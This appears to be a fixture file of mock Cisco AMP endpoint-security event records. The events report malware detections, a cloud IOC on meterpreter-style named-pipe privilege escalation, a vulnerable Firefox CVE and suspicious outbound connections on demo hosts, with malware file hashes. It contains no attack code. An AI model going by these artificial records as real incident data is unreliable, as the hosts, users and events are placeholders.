Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} 